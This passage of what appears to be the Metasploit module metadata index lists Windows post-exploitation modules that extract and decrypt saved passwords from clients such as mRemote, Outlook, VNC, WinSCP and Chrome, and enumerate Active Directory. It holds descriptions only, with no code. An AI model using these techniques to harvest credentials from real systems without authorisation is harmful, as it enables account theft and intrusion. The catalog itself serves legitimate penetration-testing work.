"full_name": "post/windows/gather/credentials/mremote",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>",
"mubix <mubix@hak5.org>"
],
"description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:14:38 +0000",
"path": "/modules/post/windows/gather/credentials/mremote.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mremote",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mssql_local_hashdump": {
"name": "Windows Gather Local SQL Server Hash Dump",
"full_name": "post/windows/gather/credentials/mssql_local_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Mike Manzotti <mike.manzotti@dionach.com>",
"nullbind"
],
"description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. It uses the\n same technique in mssql_local_auth_bypass.",
"references": [
"URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mssql_local_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/nimbuzz": {
"name": "Windows Gather Nimbuzz Instant Messenger Password Extractor",
"full_name": "post/windows/gather/credentials/nimbuzz",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/nimbuzz.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/nimbuzz",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/outlook": {
"name": "Windows Gather Microsoft Outlook Saved Password Extraction",
"full_name": "post/windows/gather/credentials/outlook",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Justin Cacak"
],
"description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-24 19:11:22 +0000",
"path": "/modules/post/windows/gather/credentials/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/outlook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/purevpn_cred_collector": {
"name": "Windows Gather PureVPN Client Credential Collector",
"full_name": "post/windows/gather/credentials/purevpn_cred_collector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Manuel Nader #AgoraSecurity"
],
"description": "Finds the password stored for the PureVPN Client.",
"references": [
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-27 16:23:09 +0000",
"path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/purevpn_cred_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/razer_synapse": {
"name": "Windows Gather Razer Synapse Password Extraction",
"full_name": "post/windows/gather/credentials/razer_synapse",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Matt Howard \"pasv\" <themdhoward@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and iv is publicly known. This module\n will not only extract encrypted password but will also decrypt\n password using public key. Affects versions earlier than 1.7.15.",
"references": [
"URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/",
"URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/razer_synapse.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razer_synapse",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/razorsql": {
"name": "Windows Gather RazorSQL Credentials",
"full_name": "post/windows/gather/credentials/razorsql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Paul Rascagneres <rascagneres@itrust.lu>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/razorsql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razorsql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/rdc_manager_creds": {
"name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction",
"full_name": "post/windows/gather/credentials/rdc_manager_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/rdc_manager_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/skype": {
"name": "Windows Gather Skype Saved Password Hash Extraction",
"full_name": "post/windows/gather/credentials/skype",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>",
"hdm <x@hdm.io>"
],
"description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5",
"references": [
"URL-http://www.recon.cx/en/f/vskype-part2.pdf",
"URL-http://insecurety.net/?p=427",
"URL-https://github.com/skypeopensource/tools"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/skype.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/skype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/smartermail": {
"name": "Windows Gather SmarterMail Password Extraction",
"full_name": "post/windows/gather/credentials/smartermail",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joe Giron",
"bcoles <bcoles@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.",
"references": [
"URL-http://www.gironsec.com/blog/tag/cracking-smartermail/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/smartermail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartermail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/smartftp": {
"name": "Windows Gather SmartFTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/smartftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module finds saved login credentials\n for the SmartFTP FTP client for windows.\n It finds the saved passwords and decrypts\n them.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 15:57:09 +0000",
"path": "/modules/post/windows/gather/credentials/smartftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/spark_im": {
"name": "Windows Gather Spark IM Password Extraction",
"full_name": "post/windows/gather/credentials/spark_im",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>"
],
"description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract encrypted\n password but will also decrypt password using public key.",
"references": [
"URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/spark_im.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/spark_im",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/sso": {
"name": "Windows Single Sign On Credential Collector (Mimikatz)",
"full_name": "post/windows/gather/credentials/sso",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Mimikatz extension. Blank passwords will not be stored\n in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/sso.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/sso",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/steam": {
"name": "Windows Gather Steam Client Session Collector.",
"full_name": "post/windows/gather/credentials/steam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nikolai Rusakov <nikolai.rusakov@gmail.com>"
],
"description": "This module will collect Steam session information from an\n account set to autologin.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/steam.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/steam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/tortoisesvn": {
"name": "Windows Gather TortoiseSVN Saved Password Extraction",
"full_name": "post/windows/gather/credentials/tortoisesvn",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Justin Cacak"
],
"description": "This module extracts and decrypts saved TortoiseSVN passwords. In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/tortoisesvn.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/tortoisesvn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/total_commander": {
"name": "Windows Gather Total Commander Saved Password Extraction",
"full_name": "post/windows/gather/credentials/total_commander",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/total_commander.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/total_commander",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/trillian": {
"name": "Windows Gather Trillian Password Extractor",
"full_name": "post/windows/gather/credentials/trillian",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sil3ntDre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/trillian.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/trillian",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/vnc": {
"name": "Windows Gather VNC Password Extraction",
"full_name": "post/windows/gather/credentials/vnc",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kurt Grutzmacher <grutz@jingojango.net>",
"mubix <mubix@hak5.org>"
],
"description": "This module extract DES encrypted passwords in known VNC locations",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/vnc.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/vnc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/windows_autologin": {
"name": "Windows Gather AutoLogin User Credential Extractor",
"full_name": "post/windows/gather/credentials/windows_autologin",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Myo Soe"
],
"description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.",
"references": [
"URL-http://support.microsoft.com/kb/315231",
"URL-http://core.yehg.net/lab/#tools.exploits"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/windows_autologin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/winscp": {
"name": "Windows Gather WinSCP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/winscp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. It cannot decrypt passwords if a master\n password is used.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/winscp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/winscp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/wsftp_client": {
"name": "Windows Gather WS_FTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/wsftp_client",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/wsftp_client.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/wsftp_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/dnscache_dump": {
"name": "Windows Gather DNS Cache",
"full_name": "post/windows/gather/dnscache_dump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module displays the records stored in the DNS cache.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/dnscache_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/dnscache_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/dumplinks": {
"name": "Windows Gather Dump Recent Files lnk Info",
"full_name": "post/windows/gather/dumplinks",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"davehull <dph_msf@trustedsignal.com>"
],
"description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/dumplinks.rb",
"is_install_path": true,
"ref_name": "windows/gather/dumplinks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_bitlocker": {
"name": "Windows Gather Active Directory BitLocker Recovery",
"full_name": "post/windows/gather/enum_ad_bitlocker",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <ben.campbell@mwrinfosecurity.com>"
],
"description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.",
"references": [
"URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_bitlocker.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_bitlocker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_computers": {
"name": "Windows Gather Active Directory Computers",
"full_name": "post/windows/gather/enum_ad_computers",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers",
"references": [
"URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_computers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_groups": {
"name": "Windows Gather Active Directory Groups",
"full_name": "post/windows/gather/enum_ad_groups",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate AD groups on the specified domain.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_groups",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_managedby_groups": {
"name": "Windows Gather Active Directory Managed Groups",
"full_name": "post/windows/gather/enum_ad_managedby_groups",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_managedby_groups",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_service_principal_names": {
"name": "Windows Gather Active Directory Service Principal Names",
"full_name": "post/windows/gather/enum_ad_service_principal_names",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Scott Sutherland"
],
"description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.",
"references": [
"URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_service_principal_names",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_to_wordlist": {
"name": "Windows Active Directory Wordlist Builder",
"full_name": "post/windows/gather/enum_ad_to_wordlist",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Thomas Ring"
],
"description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_to_wordlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_user_comments": {
"name": "Windows Gather Active Directory User Comments",
"full_name": "post/windows/gather/enum_ad_user_comments",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.",
"references": [
"URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_user_comments.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_user_comments",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_users": {
"name": "Windows Gather Active Directory Users",
"full_name": "post/windows/gather/enum_ad_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate user accounts in the default Active Domain (AD) directory and stores\n them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_applications": {
"name": "Windows Gather Installed Application Enumeration",
"full_name": "post/windows/gather/enum_applications",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate all installed applications",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_applications.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_applications",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_artifacts": {
"name": "Windows Gather File and Registry Artifacts Enumeration",
"full_name": "post/windows/gather/enum_artifacts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"averagesecurityguy <stephen@averagesecurityguy.info>"
],
"description": "This module will check the file system and registry for particular artifacts. The\n list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any\n matches are written to the loot.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_artifacts.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_artifacts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_av_excluded": {
"name": "Windows Antivirus Exclusions Enumeration",
"full_name": "post/windows/gather/enum_av_excluded",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Andrew Smith",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_av_excluded.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_av_excluded",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_chrome": {
"name": "Windows Gather Google Chrome User Data Enumeration",
"full_name": "post/windows/gather/enum_chrome",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sven Taute",
"sinn3r <sinn3r@metasploit.com>",
"Kx499",
"mubix <mubix@hak5.org>"
],
"description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/post/windows/gather/enum_chrome.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_chrome",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_computers": {
"name": "Windows Gather Enumerate Computers",
"full_name": "post/windows/gather/enum_computers",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module will enumerate computers included in the primary Domain.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
